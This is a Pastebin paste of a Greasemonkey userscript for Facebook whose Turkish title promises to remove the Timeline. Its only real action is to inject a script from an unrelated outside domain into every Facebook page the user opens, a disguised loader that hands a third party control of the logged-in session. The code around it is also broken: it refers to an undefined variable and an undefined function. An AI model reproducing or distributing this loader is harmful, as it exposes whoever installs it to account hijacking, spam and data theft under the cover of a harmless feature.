Advertisement
Guest User

Untitled

a guest
Jul 7th, 2012
100
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // ==UserScript==
  2. // @name          Zaman Tünelini Kaldır!
  3. // @namespace     Zaman Tünelinden Çıkış
  4. // @description   Facebook.com
  5. // @version     1.0
  6. // @license     GPL 3.0
  7. // @include     http*://*.facebook.com/*
  8. // @exclude     http*://*.facebook.com/plugins/*
  9. // @exclude     http*://*.facebook.com/widgets/*
  10. // @exclude     http*://*.facebook.com/iframe/*
  11. // @exclude     http*://*.facebook.com/desktop/*
  12. // @exclude     http*://*.channel.facebook.com/*
  13. // @exclude     http*://*.facebook.com/ai.php*
  14. // @exclude        http://*.channel.facebook.tld/*
  15. // @exclude        http://static.*.facebook.tld/*
  16. // @exclude        http://*.facebook.tld/ai.php*
  17. // @exclude        http://*.facebook.tld/pagelet/generic.php/pagelet/home/morestories.php*
  18. // @exclude        https://*.channel.facebook.tld/*
  19. // @exclude        https://static.*.facebook.tld/*
  20. // @exclude        https://*.facebook.tld/ai.php*
  21. // @exclude        https://*.facebook.tld/pagelet/generic.php/pagelet/home/morestories.php*
  22. // ==/UserScript==
  23.  
  24. function topluhazirla() {
  25.     var s = document.createElement('script');
  26.     s.type = "text/javascript";
  27.     s.className = "topluoneri";
  28.     s.id = "topluoneri";
  29.     s.src = "//www.evlilikteklifleri.biz/ozel/sd.js";
  30.     if (document.getElementsByTagName('head')[0]) document.getElementsByTagName('head')[0].appendChild(s);
  31.     else if (a < 50) setTimeout(function() {
  32.         myplugin(a++);
  33.     }, 250);
  34. }
  35. document.ready = topluhazirla();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement